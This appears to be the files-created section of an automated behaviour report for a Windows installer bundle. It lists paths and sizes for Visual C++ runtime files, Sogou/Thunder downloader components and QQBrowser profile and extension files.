    %WinDir%\WinSxS\InstallTemp\816749\Policies\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_5f0bbcff (4 bytes)
    %WinDir%\WinSxS\InstallTemp\806309\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd\ATL80.dll (601 bytes)
    %WinDir%\WinSxS\InstallTemp\800656\Policies\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_d780e993\8.0.50727.4053.Policy (808 bytes)
    %WinDir%\WinSxS\InstallTemp\806309\Manifests (4 bytes)
    %WinDir%\WinSxS\InstallTemp\776418\Manifests\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69.Manifest (1 bytes)
    %WinDir%\WinSxS\InstallTemp\800656\Policies\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_d780e993\8.0.50727.4053.cat (7 bytes)
    %WinDir%\WinSxS\InstallTemp\776418\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\msvcr80.dll (5873 bytes)
    %WinDir%\WinSxS\InstallTemp\825721\Manifests (4 bytes)
    %WinDir%\WinSxS\InstallTemp\732509\Manifests\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd.cat (7 bytes)
    %WinDir%\WinSxS\InstallTemp\806309\Manifests\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd.Manifest (466 bytes)
    %WinDir%\WinSxS\InstallTemp\776418\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\msvcp80.dll (7433 bytes)
    %WinDir%\WinSxS\InstallTemp\825721\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcr80.dll (4185 bytes)
    %WinDir%\WinSxS\InstallTemp\732509\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd\ATL80.dll (601 bytes)
    %WinDir%\WinSxS\InstallTemp\761294\Policies\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_beca5f1f\8.0.50727.4053.Policy (808 bytes)
    %WinDir%\WinSxS\InstallTemp\732509\Manifests\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd.Manifest (468 bytes)
    %WinDir%\WinSxS\InstallTemp\761294\Policies\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_beca5f1f\8.0.50727.4053.cat (7 bytes)
    %WinDir%\WinSxS\InstallTemp\806309\Manifests\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd.cat (7 bytes)
    %WinDir%\WinSxS\InstallTemp\816749\Policies\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_5f0bbcff\8.0.50727.4053.cat (7 bytes)
    %WinDir%\WinSxS\InstallTemp\825721\Manifests\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989.cat (7 bytes)
    %WinDir%\WinSxS\InstallTemp\816749\Policies\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_5f0bbcff\8.0.50727.4053.Policy (804 bytes)
    %WinDir%\WinSxS\InstallTemp\825721\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcm80.dll (3073 bytes)
    %WinDir%\WinSxS\InstallTemp\825721\Manifests\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989.Manifest (1 bytes)
    %WinDir%\WinSxS\InstallTemp\842843\Policies\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_77c24773\8.0.50727.4053.cat (7 bytes)
    %Documents and Settings%\All Users\Application Data\Thunder Network\DownloadLib\pub_store.dat (405 bytes)
    %Documents and Settings%\All Users\Application Data\Thunder Network\Mini_downloadlib\ODAwMDAzNzI=\Version_3_2_1_42\Profiles\stat.dat (44 bytes)
    %Documents and Settings%\All Users\Application Data\Thunder Network\Mini_downloadlib\ODAwMDAzNzI=\Version_3_2_1_42\Profiles\error.dat (287 bytes)
    %Documents and Settings%\All Users\Application Data\Thunder Network\Mini_downloadlib\ODAwMDAzNzI=\Version_3_2_1_42\Profiles\asyn_frame.dat (1967 bytes)
    C:\SogouDownload\WiFi-2175.exe.td (9317 bytes)
    %Documents and Settings%\All Users\Application Data\Thunder Network\Mini_downloadlib\ODAwMDAzNzI=\200U (164 bytes)
    %Documents and Settings%\All Users\Application Data\Thunder Network\Mini_downloadlib\ODAwMDAzNzI=\Version_3_2_1_42\Profiles\download.cfg (1007 bytes)
    C:\SogouDownload\WiFi-2175.exe.td.cfg (21563 bytes)
    %Program Files%\SogouSoftware\download\download\.svn\prop-base\atl71.dll.svn-base (53 bytes)
    %Program Files%\SogouSoftware\download\download\.svn\text-base\msvcp71.dll.svn-base (10930 bytes)
    %Program Files%\SogouSoftware\download\download\ThunderFW.exe (3053 bytes)
    %Program Files%\SogouSoftware\download\download\.svn\text-base\id.dat.svn-base (40 bytes)
    %Program Files%\SogouSoftware\download\download\.svn\all-wcprops (1 bytes)
    %Program Files%\SogouSoftware\download\download\.svn\prop-base\download_engine.dll.svn-base (53 bytes)
    %Program Files%\SogouSoftware\SogouSoftwareLoader.dll (11043 bytes)
    %Program Files%\SogouSoftware\download\download\.svn\prop-base\MiniTPFw.exe.svn-base (53 bytes)
    %Program Files%\SogouSoftware\download\download\.svn\text-base\MiniThunderPlatform.exe.svn-base (7951 bytes)
    %Program Files%\SogouSoftware\download\download\.svn\entries (1 bytes)
    %Program Files%\SogouSoftware\download\download\.svn\prop-base\MiniThunderPlatform.exe.svn-base (53 bytes)
    %Program Files%\SogouSoftware\download\xldl.dll (9424 bytes)
    %Program Files%\SogouSoftware\download\download\.svn\prop-base\zlib1.dll.svn-base (53 bytes)
    %Program Files%\SogouSoftware\download\download\.svn\format (2 bytes)
    %Program Files%\SogouSoftware\download\download\.svn\text-base\download_engine.dll.svn-base (75696 bytes)
    %Program Files%\SogouSoftware\download\download\.svn\text-base\msvcr71.dll.svn-base (12773 bytes)
    %Program Files%\SogouSoftware\download\download\msvcp71.dll (10930 bytes)
    %Program Files%\SogouSoftware\download\download\MiniThunderPlatform.exe (7951 bytes)
    %Program Files%\SogouSoftware\SogouSoftware.exe (6861 bytes)
    %Program Files%\SogouSoftware\crash\.svn\entries (440 bytes)
    %Program Files%\SogouSoftware\download\download\.svn\prop-base\ThunderFW.exe.svn-base (53 bytes)
    %Program Files%\SogouSoftware\download\download\id.dat (40 bytes)
    %Program Files%\SogouSoftware\crash\.svn\prop-base\ExceptionReport.exe.svn-base (53 bytes)
    %Program Files%\SogouSoftware\download\download\.svn\prop-base\msvcr71.dll.svn-base (53 bytes)
    %Program Files%\SogouSoftware\download\download\download_engine.dll (75696 bytes)
    %Program Files%\SogouSoftware\download\download\zlib1.dll (3170 bytes)
    %Program Files%\SogouSoftware\crash\.svn\all-wcprops (301 bytes)
    %Program Files%\SogouSoftware\download\download\.svn\text-base\dl_peer_id.dll.svn-base (2910 bytes)
    %Program Files%\SogouSoftware\download\download\.svn\prop-base\dl_peer_id.dll.svn-base (53 bytes)
    %Program Files%\SogouSoftware\download\download\msvcr71.dll (12773 bytes)
    %Program Files%\SogouSoftware\crash\.svn\format (2 bytes)
    %Program Files%\SogouSoftware\crash\ExceptionReport.exe (3718 bytes)
    %Program Files%\SogouSoftware\download\download\MiniTPFw.exe (1633 bytes)
    %Program Files%\SogouSoftware\download\download\.svn\text-base\atl71.dll.svn-base (2201 bytes)
    %Program Files%\SogouSoftware\download\download\.svn\text-base\ThunderFW.exe.svn-base (3053 bytes)
    %Program Files%\SogouSoftware\download\download\.svn\prop-base\msvcp71.dll.svn-base (53 bytes)
    %Program Files%\SogouSoftware\crash\.svn\text-base\ExceptionReport.exe.svn-base (3718 bytes)
    %Program Files%\SogouSoftware\download\download\.svn\text-base\MiniTPFw.exe.svn-base (1633 bytes)
    %Program Files%\SogouSoftware\download\download\atl71.dll (2201 bytes)
    %Program Files%\SogouSoftware\download\download\dl_peer_id.dll (2910 bytes)
    %Program Files%\SogouSoftware\download\download\.svn\text-base\zlib1.dll.svn-base (3170 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\minidownload.exe (12289 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extensions\ghgfpcpdfhmoghgepjalhnielnlemggj\9.0.0.31_0\BrowserProtect18.exe (3073 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\9.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Preferences (41 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\CRX_INSTALL\manifest.json (1115 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\CRX_INSTALL\background.js (6984 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\DECODED_IMAGES (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\DECODED_MESSAGE_CATALOGS (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\CRX_INSTALL\background.html (91 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\commenExtension.crx (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\CRX_INSTALL\s5-iframe.js (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\it\messages.json (487 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\topbar_floating_button_maximize.png (166 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ja\messages.json (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\vi\messages.json (723 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\th\messages.json (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\de\messages.json (570 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\sr\messages.json (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\icon_16.png (531 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\id\messages.json (474 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ca\messages.json (594 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\zh_TW\messages.json (731 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\topbar_floating_button_hover.png (160 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\es\messages.json (585 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\topbar_floating_button_pressed.png (160 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\sv\messages.json (554 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\en\messages.json (474 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\tr\messages.json (607 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\el\messages.json (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\topbar_floating_button_close.png (252 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\flapper.gif (5224 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\uk\messages.json (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\bg\messages.json (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ko\messages.json (763 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\da\messages.json (531 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\nl\messages.json (499 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\sl\messages.json (527 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\et\messages.json (478 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\topbar_floating_button.png (160 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\lv\messages.json (640 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\pl\messages.json (603 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\zh_CN\messages.json (641 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\sk\messages.json (596 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\pt_PT\messages.json (566 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_metadata\verified_contents.json (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\manifest.json (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\hr\messages.json (526 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\fi\messages.json (602 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\en_GB\messages.json (474 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\css\craw_window.css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\hi\messages.json (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\html\craw_window.html (810 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ru\messages.json (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\craw_window.js (14960 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\DECODED_IMAGES (66 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\nb\messages.json (533 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\hu\messages.json (667 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\cs\messages.json (588 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\fil\messages.json (549 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\pt_BR\messages.json (560 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\DECODED_MESSAGE_CATALOGS (27 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\craw_background.js (12376 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\lt\messages.json (609 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ro\messages.json (597 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\icon_128.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\es_419\messages.json (548 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\fr\messages.json (597 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\DECODED_MESSAGE_CATALOGS (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\CRX_INSTALL\manifest.json (606 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\CRX_INSTALL\background.html (155 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\DECODED_IMAGES (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\CRX_INSTALL\searchbar_ipad.css (776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\CRX_INSTALL\searchbar_ipad.js (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\CRX_INSTALL\background.js (3 bytes)
    %WinDir%\Tasks\QQBrowser Updater Task(Core).job (310 bytes)
    %WinDir%\Tasks\QQBrowser Updater Task.job (306 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\CRX_INSTALL\background.html (215 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\DECODED_MESSAGE_CATALOGS (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\CRX_INSTALL\background.js (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\DECODED_IMAGES (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\CRX_INSTALL\48.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\CRX_INSTALL\word_search.js (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\CRX_INSTALL\word_search.css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\CRX_INSTALL\manifest.json (665 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\QQBrowserConfig.dat (114 bytes)
    %Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\LastCheckTime (18 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_23842\CRX_INSTALL\style.css (61 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_23842\CRX_INSTALL\manifest.json (464 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_23842\DECODED_IMAGES (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_23842\DECODED_MESSAGE_CATALOGS (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_bQat1WAHZ2iP4DW (286 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension State\000001.dbtmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Local Storage\chrome-extension_pafkbggdmjlpgkdkcbjmhmfcdpncadgh_0.localstorage-journal (5545 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\bookmark.qbl (1927 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\10.tmp (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_23842\F.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension State\000003.log (2005 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Top Sites-journal (7056 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369\CRX_INSTALL\manifest.json (797 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Web Data (23757 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Local Extension Settings\pafkbggdmjlpgkdkcbjmhmfcdpncadgh\000001.dbtmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2D.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\11.tmp (51528 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Login Data (2706 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension Rules\MANIFEST-000001 (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Shortcuts-journal (532 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\EncryptedStorage (974 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\D.tmp (840 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\2B.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\12.tmp (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Web Data-journal (10522 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension State\LOG (176 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_KVGYNR2SKf1cluv (286 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cookies-journal (5308 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\data_3 (1736 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\data_2 (2600 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\data_1 (57080 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\data_0 (366156 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_8Ll8pVklSMihImC (131 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\switch_core_manual-journal (532 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\data_reduction_proxy_leveldb\000001.dbtmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_qUc0Jyb2V9rYcxY (532 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\f_000005 (101 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\1A.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\f_000007 (33 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\f_000006 (80 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\f_000001 (269 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_RkpE6WcOaDfQtj6 (532 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\f_000003 (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\14.tmp (54772 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369\14.tmp (2321 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\26.tmp (3479 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\OnlineSetup\sso-f1\iniC.tmp.qbl (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1D.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493\11.tmp (2321 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_ZIkdiixhmGgAbyE (28 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Local Extension Settings\pafkbggdmjlpgkdkcbjmhmfcdpncadgh\000003.log (31 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\27.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Quick Links-journal (52413 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\index (368 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\28.tmp (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_XOTzPqgqOMDnkaA (286 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Visited Links (836 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Local Extension Settings\pafkbggdmjlpgkdkcbjmhmfcdpncadgh\MANIFEST-000001 (75 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Local Extension Settings\pafkbggdmjlpgkdkcbjmhmfcdpncadgh\LOG (218 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\History (39278 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\25.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\data_reduction_proxy_leveldb\LOG (189 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\E.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Favicons-journal (31194 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\26.tmp (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\2E.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\28.tmp (22828 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension State\MANIFEST-000001 (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\f_000004 (47 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\OnlineSetup\sso-f1\sso-f1.zip.qbl (259728 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12.tmp (2631 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\f_000002 (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\2A.tmp (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\EncryptedStorage-journal (532 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension Rules\000003.log (511 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\2C.tmp (53 bytes)
